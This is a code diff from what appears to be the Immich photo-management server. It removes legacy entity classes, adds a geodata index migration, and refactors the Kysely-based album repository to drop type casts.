||||||
import { AssetEntity } from 'src/entities/asset.entity';
|
|
||||||
import { SharedLinkEntity } from 'src/entities/shared-link.entity';
|
|
||||||
import { AssetOrder } from 'src/enum';
|
|
||||||
|
|
||||||
export class AlbumEntity {
|
|
||||||
id!: string;
|
|
||||||
owner!: User;
|
|
||||||
ownerId!: string;
|
|
||||||
albumName!: string;
|
|
||||||
description!: string;
|
|
||||||
createdAt!: Date;
|
|
||||||
updatedAt!: Date;
|
|
||||||
updateId?: string;
|
|
||||||
deletedAt!: Date | null;
|
|
||||||
albumThumbnailAsset!: AssetEntity | null;
|
|
||||||
albumThumbnailAssetId!: string | null;
|
|
||||||
albumUsers!: AlbumUser[];
|
|
||||||
assets!: AssetEntity[];
|
|
||||||
sharedLinks!: SharedLinkEntity[];
|
|
||||||
isActivityEnabled!: boolean;
|
|
||||||
order!: AssetOrder;
|
|
||||||
}
|
|
@ -1,270 +0,0 @@
|
|||||||
import { DeduplicateJoinsPlugin, ExpressionBuilder, Kysely, SelectQueryBuilder, sql } from 'kysely';
|
|
||||||
import { jsonArrayFrom, jsonObjectFrom } from 'kysely/helpers/postgres';
|
|
||||||
import { AssetFace, AssetFile, AssetJobStatus, columns, Exif, Stack, Tag, User } from 'src/database';
|
|
||||||
import { DB } from 'src/db';
|
|
||||||
import { SharedLinkEntity } from 'src/entities/shared-link.entity';
|
|
||||||
import { AssetFileType, AssetStatus, AssetType } from 'src/enum';
|
|
||||||
import { TimeBucketSize } from 'src/repositories/asset.repository';
|
|
||||||
import { AssetSearchBuilderOptions } from 'src/repositories/search.repository';
|
|
||||||
import { anyUuid, asUuid } from 'src/utils/database';
|
|
||||||
|
|
||||||
export const ASSET_CHECKSUM_CONSTRAINT = 'UQ_assets_owner_checksum';
|
|
||||||
|
|
||||||
export class AssetEntity {
|
|
||||||
id!: string;
|
|
||||||
deviceAssetId!: string;
|
|
||||||
owner!: User;
|
|
||||||
ownerId!: string;
|
|
||||||
libraryId?: string | null;
|
|
||||||
deviceId!: string;
|
|
||||||
type!: AssetType;
|
|
||||||
status!: AssetStatus;
|
|
||||||
originalPath!: string;
|
|
||||||
files!: AssetFile[];
|
|
||||||
thumbhash!: Buffer | null;
|
|
||||||
encodedVideoPath!: string | null;
|
|
||||||
createdAt!: Date;
|
|
||||||
updatedAt!: Date;
|
|
||||||
updateId?: string;
|
|
||||||
deletedAt!: Date | null;
|
|
||||||
fileCreatedAt!: Date;
|
|
||||||
localDateTime!: Date;
|
|
||||||
fileModifiedAt!: Date;
|
|
||||||
isFavorite!: boolean;
|
|
||||||
isArchived!: boolean;
|
|
||||||
isExternal!: boolean;
|
|
||||||
isOffline!: boolean;
|
|
||||||
checksum!: Buffer; // sha1 checksum
|
|
||||||
duration!: string | null;
|
|
||||||
isVisible!: boolean;
|
|
||||||
livePhotoVideo!: AssetEntity | null;
|
|
||||||
livePhotoVideoId!: string | null;
|
|
||||||
originalFileName!: string;
|
|
||||||
sidecarPath!: string | null;
|
|
||||||
exifInfo?: Exif;
|
|
||||||
tags?: Tag[];
|
|
||||||
sharedLinks!: SharedLinkEntity[];
|
|
||||||
faces!: AssetFace[];
|
|
||||||
stackId?: string | null;
|
|
||||||
stack?: Stack | null;
|
|
||||||
jobStatus?: AssetJobStatus;
|
|
||||||
duplicateId!: string | null;
|
|
||||||
}
|
|
||||||
|
|
||||||
export function withExif<O>(qb: SelectQueryBuilder<DB, 'assets', O>) {
|
|
||||||
return qb
|
|
||||||
.leftJoin('exif', 'assets.id', 'exif.assetId')
|
|
||||||
.select((eb) => eb.fn.toJson(eb.table('exif')).$castTo<Exif | null>().as('exifInfo'));
|
|
||||||
}
|
|
||||||
|
|
||||||
export function withExifInner<O>(qb: SelectQueryBuilder<DB, 'assets', O>) {
|
|
||||||
return qb
|
|
||||||
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
|
||||||
.select((eb) => eb.fn.toJson(eb.table('exif')).$castTo<Exif>().as('exifInfo'));
|
|
||||||
}
|
|
||||||
|
|
||||||
export function withSmartSearch<O>(qb: SelectQueryBuilder<DB, 'assets', O>) {
|
|
||||||
return qb
|
|
||||||
.leftJoin('smart_search', 'assets.id', 'smart_search.assetId')
|
|
||||||
.select((eb) => eb.fn.toJson(eb.table('smart_search')).as('smartSearch'));
|
|
||||||
}
|
|
||||||
|
|
||||||
export function withFaces(eb: ExpressionBuilder<DB, 'assets'>, withDeletedFace?: boolean) {
|
|
||||||
return jsonArrayFrom(
|
|
||||||
eb
|
|
||||||
.selectFrom('asset_faces')
|
|
||||||
.selectAll('asset_faces')
|
|
||||||
.whereRef('asset_faces.assetId', '=', 'assets.id')
|
|
||||||
.$if(!withDeletedFace, (qb) => qb.where('asset_faces.deletedAt', 'is', null)),
|
|
||||||
).as('faces');
|
|
||||||
}
|
|
||||||
|
|
||||||
export function withFiles(eb: ExpressionBuilder<DB, 'assets'>, type?: AssetFileType) {
|
|
||||||
return jsonArrayFrom(
|
|
||||||
eb
|
|
||||||
.selectFrom('asset_files')
|
|
||||||
.select(columns.assetFiles)
|
|
||||||
.whereRef('asset_files.assetId', '=', 'assets.id')
|
|
||||||
.$if(!!type, (qb) => qb.where('asset_files.type', '=', type!)),
|
|
||||||
).as('files');
|
|
||||||
}
|
|
||||||
|
|
||||||
export function withFacesAndPeople(eb: ExpressionBuilder<DB, 'assets'>, withDeletedFace?: boolean) {
|
|
||||||
return jsonArrayFrom(
|
|
||||||
eb
|
|
||||||
.selectFrom('asset_faces')
|
|
||||||
.leftJoinLateral(
|
|
||||||
(eb) =>
|
|
||||||
eb.selectFrom('person').selectAll('person').whereRef('asset_faces.personId', '=', 'person.id').as('person'),
|
|
||||||
(join) => join.onTrue(),
|
|
||||||
)
|
|
||||||
.selectAll('asset_faces')
|
|
||||||
.select((eb) => eb.table('person').as('person'))
|
|
||||||
.whereRef('asset_faces.assetId', '=', 'assets.id')
|
|
||||||
.$if(!withDeletedFace, (qb) => qb.where('asset_faces.deletedAt', 'is', null)),
|
|
||||||
).as('faces');
|
|
||||||
}
|
|
||||||
|
|
||||||
export function hasPeople<O>(qb: SelectQueryBuilder<DB, 'assets', O>, personIds: string[]) {
|
|
||||||
return qb.innerJoin(
|
|
||||||
(eb) =>
|
|
||||||
eb
|
|
||||||
.selectFrom('asset_faces')
|
|
||||||
.select('assetId')
|
|
||||||
.where('personId', '=', anyUuid(personIds!))
|
|
||||||
.where('deletedAt', 'is', null)
|
|
||||||
.groupBy('assetId')
|
|
||||||
.having((eb) => eb.fn.count('personId').distinct(), '=', personIds.length)
|
|
||||||
.as('has_people'),
|
|
||||||
(join) => join.onRef('has_people.assetId', '=', 'assets.id'),
|
|
||||||
);
|
|
||||||
}
|
|
||||||
|
|
||||||
export function hasTags<O>(qb: SelectQueryBuilder<DB, 'assets', O>, tagIds: string[]) {
|
|
||||||
return qb.innerJoin(
|
|
||||||
(eb) =>
|
|
||||||
eb
|
|
||||||
.selectFrom('tag_asset')
|
|
||||||
.select('assetsId')
|
|
||||||
.innerJoin('tags_closure', 'tag_asset.tagsId', 'tags_closure.id_descendant')
|
|
||||||
.where('tags_closure.id_ancestor', '=', anyUuid(tagIds))
|
|
||||||
.groupBy('assetsId')
|
|
||||||
.having((eb) => eb.fn.count('tags_closure.id_ancestor').distinct(), '>=', tagIds.length)
|
|
||||||
.as('has_tags'),
|
|
||||||
(join) => join.onRef('has_tags.assetsId', '=', 'assets.id'),
|
|
||||||
);
|
|
||||||
}
|
|
||||||
|
|
||||||
export function withOwner(eb: ExpressionBuilder<DB, 'assets'>) {
|
|
||||||
return jsonObjectFrom(eb.selectFrom('users').selectAll().whereRef('users.id', '=', 'assets.ownerId')).as('owner');
|
|
||||||
}
|
|
||||||
|
|
||||||
export function withLibrary(eb: ExpressionBuilder<DB, 'assets'>) {
|
|
||||||
return jsonObjectFrom(eb.selectFrom('libraries').selectAll().whereRef('libraries.id', '=', 'assets.libraryId')).as(
|
|
||||||
'library',
|
|
||||||
);
|
|
||||||
}
|
|
||||||
|
|
||||||
export function withTags(eb: ExpressionBuilder<DB, 'assets'>) {
|
|
||||||
return jsonArrayFrom(
|
|
||||||
eb
|
|
||||||
.selectFrom('tags')
|
|
||||||
.select(columns.tag)
|
|
||||||
.innerJoin('tag_asset', 'tags.id', 'tag_asset.tagsId')
|
|
||||||
.whereRef('assets.id', '=', 'tag_asset.assetsId'),
|
|
||||||
).as('tags');
|
|
||||||
}
|
|
||||||
|
|
||||||
export function truncatedDate<O>(size: TimeBucketSize) {
|
|
||||||
return sql<O>`date_trunc(${size}, "localDateTime" at time zone 'UTC') at time zone 'UTC'`;
|
|
||||||
}
|
|
||||||
|
|
||||||
export function withTagId<O>(qb: SelectQueryBuilder<DB, 'assets', O>, tagId: string) {
|
|
||||||
return qb.where((eb) =>
|
|
||||||
eb.exists(
|
|
||||||
eb
|
|
||||||
.selectFrom('tags_closure')
|
|
||||||
.innerJoin('tag_asset', 'tag_asset.tagsId', 'tags_closure.id_descendant')
|
|
||||||
.whereRef('tag_asset.assetsId', '=', 'assets.id')
|
|
||||||
.where('tags_closure.id_ancestor', '=', tagId),
|
|
||||||
),
|
|
||||||
);
|
|
||||||
}
|
|
||||||
|
|
||||||
const joinDeduplicationPlugin = new DeduplicateJoinsPlugin();
|
|
||||||
|
|
||||||
/** TODO: This should only be used for search-related queries, not as a general purpose query builder */
|
|
||||||
export function searchAssetBuilder(kysely: Kysely<DB>, options: AssetSearchBuilderOptions) {
|
|
||||||
options.isArchived ??= options.withArchived ? undefined : false;
|
|
||||||
options.withDeleted ||= !!(options.trashedAfter || options.trashedBefore || options.isOffline);
|
|
||||||
return kysely
|
|
||||||
.withPlugin(joinDeduplicationPlugin)
|
|
||||||
.selectFrom('assets')
|
|
||||||
.selectAll('assets')
|
|
||||||
.$if(!!options.tagIds && options.tagIds.length > 0, (qb) => hasTags(qb, options.tagIds!))
|
|
||||||
.$if(!!options.personIds && options.personIds.length > 0, (qb) => hasPeople(qb, options.personIds!))
|
|
||||||
.$if(!!options.createdBefore, (qb) => qb.where('assets.createdAt', '<=', options.createdBefore!))
|
|
||||||
.$if(!!options.createdAfter, (qb) => qb.where('assets.createdAt', '>=', options.createdAfter!))
|
|
||||||
.$if(!!options.updatedBefore, (qb) => qb.where('assets.updatedAt', '<=', options.updatedBefore!))
|
|
||||||
.$if(!!options.updatedAfter, (qb) => qb.where('assets.updatedAt', '>=', options.updatedAfter!))
|
|
||||||
.$if(!!options.trashedBefore, (qb) => qb.where('assets.deletedAt', '<=', options.trashedBefore!))
|
|
||||||
.$if(!!options.trashedAfter, (qb) => qb.where('assets.deletedAt', '>=', options.trashedAfter!))
|
|
||||||
.$if(!!options.takenBefore, (qb) => qb.where('assets.fileCreatedAt', '<=', options.takenBefore!))
|
|
||||||
.$if(!!options.takenAfter, (qb) => qb.where('assets.fileCreatedAt', '>=', options.takenAfter!))
|
|
||||||
.$if(options.city !== undefined, (qb) =>
|
|
||||||
qb
|
|
||||||
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
|
||||||
.where('exif.city', options.city === null ? 'is' : '=', options.city!),
|
|
||||||
)
|
|
||||||
.$if(options.state !== undefined, (qb) =>
|
|
||||||
qb
|
|
||||||
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
|
||||||
.where('exif.state', options.state === null ? 'is' : '=', options.state!),
|
|
||||||
)
|
|
||||||
.$if(options.country !== undefined, (qb) =>
|
|
||||||
qb
|
|
||||||
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
|
||||||
.where('exif.country', options.country === null ? 'is' : '=', options.country!),
|
|
||||||
)
|
|
||||||
.$if(options.make !== undefined, (qb) =>
|
|
||||||
qb
|
|
||||||
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
|
||||||
.where('exif.make', options.make === null ? 'is' : '=', options.make!),
|
|
||||||
)
|
|
||||||
.$if(options.model !== undefined, (qb) =>
|
|
||||||
qb
|
|
||||||
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
|
||||||
.where('exif.model', options.model === null ? 'is' : '=', options.model!),
|
|
||||||
)
|
|
||||||
.$if(options.lensModel !== undefined, (qb) =>
|
|
||||||
qb
|
|
||||||
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
|
||||||
.where('exif.lensModel', options.lensModel === null ? 'is' : '=', options.lensModel!),
|
|
||||||
)
|
|
||||||
.$if(options.rating !== undefined, (qb) =>
|
|
||||||
qb
|
|
||||||
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
|
||||||
.where('exif.rating', options.rating === null ? 'is' : '=', options.rating!),
|
|
||||||
)
|
|
||||||
.$if(!!options.checksum, (qb) => qb.where('assets.checksum', '=', options.checksum!))
|
|
||||||
.$if(!!options.deviceAssetId, (qb) => qb.where('assets.deviceAssetId', '=', options.deviceAssetId!))
|
|
||||||
.$if(!!options.deviceId, (qb) => qb.where('assets.deviceId', '=', options.deviceId!))
|
|
||||||
.$if(!!options.id, (qb) => qb.where('assets.id', '=', asUuid(options.id!)))
|
|
||||||
.$if(!!options.libraryId, (qb) => qb.where('assets.libraryId', '=', asUuid(options.libraryId!)))
|
|
||||||
.$if(!!options.userIds, (qb) => qb.where('assets.ownerId', '=', anyUuid(options.userIds!)))
|
|
||||||
.$if(!!options.encodedVideoPath, (qb) => qb.where('assets.encodedVideoPath', '=', options.encodedVideoPath!))
|
|
||||||
.$if(!!options.originalPath, (qb) =>
|
|
||||||
qb.where(sql`f_unaccent(assets."originalPath")`, 'ilike', sql`'%' || f_unaccent(${options.originalPath}) || '%'`),
|
|
||||||
)
|
|
||||||
.$if(!!options.originalFileName, (qb) =>
|
|
||||||
qb.where(
|
|
||||||
sql`f_unaccent(assets."originalFileName")`,
|
|
||||||
'ilike',
|
|
||||||
sql`'%' || f_unaccent(${options.originalFileName}) || '%'`,
|
|
||||||
),
|
|
||||||
)
|
|
||||||
.$if(!!options.description, (qb) =>
|
|
||||||
qb
|
|
||||||
.innerJoin('exif', 'assets.id', 'exif.assetId')
|
|
||||||
.where(sql`f_unaccent(exif.description)`, 'ilike', sql`'%' || f_unaccent(${options.description}) || '%'`),
|
|
||||||
)
|
|
||||||
.$if(!!options.type, (qb) => qb.where('assets.type', '=', options.type!))
|
|
||||||
.$if(options.isFavorite !== undefined, (qb) => qb.where('assets.isFavorite', '=', options.isFavorite!))
|
|
||||||
.$if(options.isOffline !== undefined, (qb) => qb.where('assets.isOffline', '=', options.isOffline!))
|
|
||||||
.$if(options.isVisible !== undefined, (qb) => qb.where('assets.isVisible', '=', options.isVisible!))
|
|
||||||
.$if(options.isArchived !== undefined, (qb) => qb.where('assets.isArchived', '=', options.isArchived!))
|
|
||||||
.$if(options.isEncoded !== undefined, (qb) =>
|
|
||||||
qb.where('assets.encodedVideoPath', options.isEncoded ? 'is not' : 'is', null),
|
|
||||||
)
|
|
||||||
.$if(options.isMotion !== undefined, (qb) =>
|
|
||||||
qb.where('assets.livePhotoVideoId', options.isMotion ? 'is not' : 'is', null),
|
|
||||||
)
|
|
||||||
.$if(!!options.isNotInAlbum, (qb) =>
|
|
||||||
qb.where((eb) =>
|
|
||||||
eb.not(eb.exists((eb) => eb.selectFrom('albums_assets_assets').whereRef('assetsId', '=', 'assets.id'))),
|
|
||||||
),
|
|
||||||
)
|
|
||||||
.$if(!!options.withExif, withExifInner)
|
|
||||||
.$if(!!(options.withFaces || options.withPeople || options.personIds), (qb) => qb.select(withFacesAndPeople))
|
|
||||||
.$if(!options.withDeleted, (qb) => qb.where('assets.deletedAt', 'is', null));
|
|
||||||
}
|
|
@ -1,20 +0,0 @@
|
|||||||
import { AlbumEntity } from 'src/entities/album.entity';
|
|
||||||
import { AssetEntity } from 'src/entities/asset.entity';
|
|
||||||
import { SharedLinkType } from 'src/enum';
|
|
||||||
|
|
||||||
export class SharedLinkEntity {
|
|
||||||
id!: string;
|
|
||||||
description!: string | null;
|
|
||||||
password!: string | null;
|
|
||||||
userId!: string;
|
|
||||||
key!: Buffer; // use to access the inidividual asset
|
|
||||||
type!: SharedLinkType;
|
|
||||||
createdAt!: Date;
|
|
||||||
expiresAt!: Date | null;
|
|
||||||
allowUpload!: boolean;
|
|
||||||
allowDownload!: boolean;
|
|
||||||
showExif!: boolean;
|
|
||||||
assets!: AssetEntity[];
|
|
||||||
album?: AlbumEntity;
|
|
||||||
albumId!: string | null;
|
|
||||||
}
|
|
13
server/src/migrations/1744910873956-AddMissingIndex.ts
Normal file
13
server/src/migrations/1744910873956-AddMissingIndex.ts
Normal file
@ -0,0 +1,13 @@
|
|||||||
|
import { MigrationInterface, QueryRunner } from 'typeorm';
|
||||||
|
|
||||||
|
export class AddMissingIndex1744910873956 implements MigrationInterface {
|
||||||
|
public async up(queryRunner: QueryRunner): Promise<void> {
|
||||||
|
await queryRunner.query(
|
||||||
|
`CREATE INDEX IF NOT EXISTS "IDX_geodata_gist_earthcoord" ON "geodata_places" (ll_to_earth_public(latitude, longitude))`,
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
|
public async down(queryRunner: QueryRunner): Promise<void> {
|
||||||
|
await queryRunner.query(`DROP INDEX "IDX_geodata_gist_earthcoord";`);
|
||||||
|
}
|
||||||
|
}
|
@ -82,7 +82,7 @@ from
|
|||||||
where
|
where
|
||||||
"assets"."id" = any ($1::uuid[])
|
"assets"."id" = any ($1::uuid[])
|
||||||
|
|
||||||
-- AssetRepository.getByIdsWithAllRelations
|
-- AssetRepository.getByIdsWithAllRelationsButStacks
|
||||||
select
|
select
|
||||||
"assets".*,
|
"assets".*,
|
||||||
(
|
(
|
||||||
@ -127,28 +127,13 @@ select
|
|||||||
"assets"."id" = "tag_asset"."assetsId"
|
"assets"."id" = "tag_asset"."assetsId"
|
||||||
) as agg
|
) as agg
|
||||||
) as "tags",
|
) as "tags",
|
||||||
to_json("exif") as "exifInfo",
|
to_json("exif") as "exifInfo"
|
||||||
to_json("stacked_assets") as "stack"
|
|
||||||
from
|
from
|
||||||
"assets"
|
"assets"
|
||||||
left join "exif" on "assets"."id" = "exif"."assetId"
|
left join "exif" on "assets"."id" = "exif"."assetId"
|
||||||
left join "asset_stack" on "asset_stack"."id" = "assets"."stackId"
|
left join "asset_stack" on "asset_stack"."id" = "assets"."stackId"
|
||||||
left join lateral (
|
|
||||||
select
|
|
||||||
"asset_stack".*,
|
|
||||||
array_agg("stacked") as "assets"
|
|
||||||
from
|
|
||||||
"assets" as "stacked"
|
|
||||||
where
|
|
||||||
"stacked"."stackId" = "asset_stack"."id"
|
|
||||||
and "stacked"."id" != "asset_stack"."primaryAssetId"
|
|
||||||
and "stacked"."deletedAt" is null
|
|
||||||
and "stacked"."isArchived" = $1
|
|
||||||
group by
|
|
||||||
"asset_stack"."id"
|
|
||||||
) as "stacked_assets" on "asset_stack"."id" is not null
|
|
||||||
where
|
where
|
||||||
"assets"."id" = any ($2::uuid[])
|
"assets"."id" = any ($1::uuid[])
|
||||||
|
|
||||||
-- AssetRepository.deleteAll
|
-- AssetRepository.deleteAll
|
||||||
delete from "assets"
|
delete from "assets"
|
||||||
|
@ -1,12 +1,11 @@
|
|||||||
import { Injectable } from '@nestjs/common';
|
import { Injectable } from '@nestjs/common';
|
||||||
import { ExpressionBuilder, Insertable, Kysely, sql, Updateable } from 'kysely';
|
import { ExpressionBuilder, Insertable, Kysely, NotNull, sql, Updateable } from 'kysely';
|
||||||
import { jsonArrayFrom, jsonObjectFrom } from 'kysely/helpers/postgres';
|
import { jsonArrayFrom, jsonObjectFrom } from 'kysely/helpers/postgres';
|
||||||
import { InjectKysely } from 'nestjs-kysely';
|
import { InjectKysely } from 'nestjs-kysely';
|
||||||
import { columns } from 'src/database';
|
import { columns, Exif } from 'src/database';
|
||||||
import { Albums, DB } from 'src/db';
|
import { Albums, DB } from 'src/db';
|
||||||
import { Chunked, ChunkedArray, ChunkedSet, DummyValue, GenerateSql } from 'src/decorators';
|
import { Chunked, ChunkedArray, ChunkedSet, DummyValue, GenerateSql } from 'src/decorators';
|
||||||
import { AlbumUserCreateDto } from 'src/dtos/album.dto';
|
import { AlbumUserCreateDto } from 'src/dtos/album.dto';
|
||||||
import { AlbumEntity } from 'src/entities/album.entity';
|
|
||||||
|
|
||||||
export interface AlbumAssetCount {
|
export interface AlbumAssetCount {
|
||||||
albumId: string;
|
albumId: string;
|
||||||
@ -21,9 +20,9 @@ export interface AlbumInfoOptions {
|
|||||||
}
|
}
|
||||||
|
|
||||||
const withOwner = (eb: ExpressionBuilder<DB, 'albums'>) => {
|
const withOwner = (eb: ExpressionBuilder<DB, 'albums'>) => {
|
||||||
return jsonObjectFrom(eb.selectFrom('users').select(columns.user).whereRef('users.id', '=', 'albums.ownerId')).as(
|
return jsonObjectFrom(eb.selectFrom('users').select(columns.user).whereRef('users.id', '=', 'albums.ownerId'))
|
||||||
'owner',
|
.$notNull()
|
||||||
);
|
.as('owner');
|
||||||
};
|
};
|
||||||
|
|
||||||
const withAlbumUsers = (eb: ExpressionBuilder<DB, 'albums'>) => {
|
const withAlbumUsers = (eb: ExpressionBuilder<DB, 'albums'>) => {
|
||||||
@ -32,12 +31,14 @@ const withAlbumUsers = (eb: ExpressionBuilder<DB, 'albums'>) => {
|
|||||||
.selectFrom('albums_shared_users_users as album_users')
|
.selectFrom('albums_shared_users_users as album_users')
|
||||||
.select('album_users.role')
|
.select('album_users.role')
|
||||||
.select((eb) =>
|
.select((eb) =>
|
||||||
jsonObjectFrom(eb.selectFrom('users').select(columns.user).whereRef('users.id', '=', 'album_users.usersId')).as(
|
jsonObjectFrom(eb.selectFrom('users').select(columns.user).whereRef('users.id', '=', 'album_users.usersId'))
|
||||||
'user',
|
.$notNull()
|
||||||
),
|
.as('user'),
|
||||||
)
|
)
|
||||||
.whereRef('album_users.albumsId', '=', 'albums.id'),
|
.whereRef('album_users.albumsId', '=', 'albums.id'),
|
||||||
).as('albumUsers');
|
)
|
||||||
|
.$notNull()
|
||||||
|
.as('albumUsers');
|
||||||
};
|
};
|
||||||
|
|
||||||
const withSharedLink = (eb: ExpressionBuilder<DB, 'albums'>) => {
|
const withSharedLink = (eb: ExpressionBuilder<DB, 'albums'>) => {
|
||||||
@ -53,7 +54,7 @@ const withAssets = (eb: ExpressionBuilder<DB, 'albums'>) => {
|
|||||||
.selectFrom('assets')
|
.selectFrom('assets')
|
||||||
.selectAll('assets')
|
.selectAll('assets')
|
||||||
.leftJoin('exif', 'assets.id', 'exif.assetId')
|
.leftJoin('exif', 'assets.id', 'exif.assetId')
|
||||||
.select((eb) => eb.table('exif').as('exifInfo'))
|
.select((eb) => eb.table('exif').$castTo<Exif>().as('exifInfo'))
|
||||||
.innerJoin('albums_assets_assets', 'albums_assets_assets.assetsId', 'assets.id')
|
.innerJoin('albums_assets_assets', 'albums_assets_assets.assetsId', 'assets.id')
|
||||||
.whereRef('albums_assets_assets.albumsId', '=', 'albums.id')
|
.whereRef('albums_assets_assets.albumsId', '=', 'albums.id')
|
||||||
.where('assets.deletedAt', 'is', null)
|
.where('assets.deletedAt', 'is', null)
|
||||||
@ -69,7 +70,7 @@ export class AlbumRepository {
|
|||||||
constructor(@InjectKysely() private db: Kysely<DB>) {}
|
constructor(@InjectKysely() private db: Kysely<DB>) {}
|
||||||
|
|
||||||
@GenerateSql({ params: [DummyValue.UUID, { withAssets: true }] })
|
@GenerateSql({ params: [DummyValue.UUID, { withAssets: true }] })
|
||||||
async getById(id: string, options: AlbumInfoOptions): Promise<AlbumEntity | undefined> {
|
async getById(id: string, options: AlbumInfoOptions) {
|
||||||
return this.db
|
return this.db
|
||||||
.selectFrom('albums')
|
.selectFrom('albums')
|
||||||
.selectAll('albums')
|
.selectAll('albums')
|
||||||
@ -79,11 +80,12 @@ export class AlbumRepository {
|
|||||||
.select(withAlbumUsers)
|
.select(withAlbumUsers)
|
||||||
.select(withSharedLink)
|
.select(withSharedLink)
|
||||||
.$if(options.withAssets, (eb) => eb.select(withAssets))
|
.$if(options.withAssets, (eb) => eb.select(withAssets))
|
||||||
.executeTakeFirst() as Promise<AlbumEntity | undefined>;
|
.$narrowType<{ assets: NotNull }>()
|
||||||
|
.executeTakeFirst();
|
||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [DummyValue.UUID, DummyValue.UUID] })
|
@GenerateSql({ params: [DummyValue.UUID, DummyValue.UUID] })
|
||||||
async getByAssetId(ownerId: string, assetId: string): Promise<AlbumEntity[]> {
|
async getByAssetId(ownerId: string, assetId: string) {
|
||||||
return this.db
|
return this.db
|
||||||
.selectFrom('albums')
|
.selectFrom('albums')
|
||||||
.selectAll('albums')
|
.selectAll('albums')
|
||||||
@ -105,7 +107,7 @@ export class AlbumRepository {
|
|||||||
.select(withOwner)
|
.select(withOwner)
|
||||||
.select(withAlbumUsers)
|
.select(withAlbumUsers)
|
||||||
.orderBy('albums.createdAt', 'desc')
|
.orderBy('albums.createdAt', 'desc')
|
||||||
.execute() as unknown as Promise<AlbumEntity[]>;
|
.execute();
|
||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [[DummyValue.UUID]] })
|
@GenerateSql({ params: [[DummyValue.UUID]] })
|
||||||
@ -134,7 +136,7 @@ export class AlbumRepository {
|
|||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [DummyValue.UUID] })
|
@GenerateSql({ params: [DummyValue.UUID] })
|
||||||
async getOwned(ownerId: string): Promise<AlbumEntity[]> {
|
async getOwned(ownerId: string) {
|
||||||
return this.db
|
return this.db
|
||||||
.selectFrom('albums')
|
.selectFrom('albums')
|
||||||
.selectAll('albums')
|
.selectAll('albums')
|
||||||
@ -144,14 +146,14 @@ export class AlbumRepository {
|
|||||||
.where('albums.ownerId', '=', ownerId)
|
.where('albums.ownerId', '=', ownerId)
|
||||||
.where('albums.deletedAt', 'is', null)
|
.where('albums.deletedAt', 'is', null)
|
||||||
.orderBy('albums.createdAt', 'desc')
|
.orderBy('albums.createdAt', 'desc')
|
||||||
.execute() as unknown as Promise<AlbumEntity[]>;
|
.execute();
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Get albums shared with and shared by owner.
|
* Get albums shared with and shared by owner.
|
||||||
*/
|
*/
|
||||||
@GenerateSql({ params: [DummyValue.UUID] })
|
@GenerateSql({ params: [DummyValue.UUID] })
|
||||||
async getShared(ownerId: string): Promise<AlbumEntity[]> {
|
async getShared(ownerId: string) {
|
||||||
return this.db
|
return this.db
|
||||||
.selectFrom('albums')
|
.selectFrom('albums')
|
||||||
.selectAll('albums')
|
.selectAll('albums')
|
||||||
@ -176,14 +178,14 @@ export class AlbumRepository {
|
|||||||
.select(withOwner)
|
.select(withOwner)
|
||||||
.select(withSharedLink)
|
.select(withSharedLink)
|
||||||
.orderBy('albums.createdAt', 'desc')
|
.orderBy('albums.createdAt', 'desc')
|
||||||
.execute() as unknown as Promise<AlbumEntity[]>;
|
.execute();
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Get albums of owner that are _not_ shared
|
* Get albums of owner that are _not_ shared
|
||||||
*/
|
*/
|
||||||
@GenerateSql({ params: [DummyValue.UUID] })
|
@GenerateSql({ params: [DummyValue.UUID] })
|
||||||
async getNotShared(ownerId: string): Promise<AlbumEntity[]> {
|
async getNotShared(ownerId: string) {
|
||||||
return this.db
|
return this.db
|
||||||
.selectFrom('albums')
|
.selectFrom('albums')
|
||||||
.selectAll('albums')
|
.selectAll('albums')
|
||||||
@ -203,7 +205,7 @@ export class AlbumRepository {
|
|||||||
)
|
)
|
||||||
.select(withOwner)
|
.select(withOwner)
|
||||||
.orderBy('albums.createdAt', 'desc')
|
.orderBy('albums.createdAt', 'desc')
|
||||||
.execute() as unknown as Promise<AlbumEntity[]>;
|
.execute();
|
||||||
}
|
}
|
||||||
|
|
||||||
async restoreAll(userId: string): Promise<void> {
|
async restoreAll(userId: string): Promise<void> {
|
||||||
@ -262,7 +264,7 @@ export class AlbumRepository {
|
|||||||
await this.addAssets(this.db, albumId, assetIds);
|
await this.addAssets(this.db, albumId, assetIds);
|
||||||
}
|
}
|
||||||
|
|
||||||
create(album: Insertable<Albums>, assetIds: string[], albumUsers: AlbumUserCreateDto[]): Promise<AlbumEntity> {
|
create(album: Insertable<Albums>, assetIds: string[], albumUsers: AlbumUserCreateDto[]) {
|
||||||
return this.db.transaction().execute(async (tx) => {
|
return this.db.transaction().execute(async (tx) => {
|
||||||
const newAlbum = await tx.insertInto('albums').values(album).returning('albums.id').executeTakeFirst();
|
const newAlbum = await tx.insertInto('albums').values(album).returning('albums.id').executeTakeFirst();
|
||||||
|
|
||||||
@ -290,11 +292,12 @@ export class AlbumRepository {
|
|||||||
.select(withOwner)
|
.select(withOwner)
|
||||||
.select(withAssets)
|
.select(withAssets)
|
||||||
.select(withAlbumUsers)
|
.select(withAlbumUsers)
|
||||||
.executeTakeFirst() as unknown as Promise<AlbumEntity>;
|
.$narrowType<{ assets: NotNull }>()
|
||||||
|
.executeTakeFirstOrThrow();
|
||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
|
||||||
update(id: string, album: Updateable<Albums>): Promise<AlbumEntity> {
|
update(id: string, album: Updateable<Albums>) {
|
||||||
return this.db
|
return this.db
|
||||||
.updateTable('albums')
|
.updateTable('albums')
|
||||||
.set(album)
|
.set(album)
|
||||||
@ -303,7 +306,7 @@ export class AlbumRepository {
|
|||||||
.returning(withOwner)
|
.returning(withOwner)
|
||||||
.returning(withSharedLink)
|
.returning(withSharedLink)
|
||||||
.returning(withAlbumUsers)
|
.returning(withAlbumUsers)
|
||||||
.executeTakeFirst() as unknown as Promise<AlbumEntity>;
|
.executeTakeFirstOrThrow();
|
||||||
}
|
}
|
||||||
|
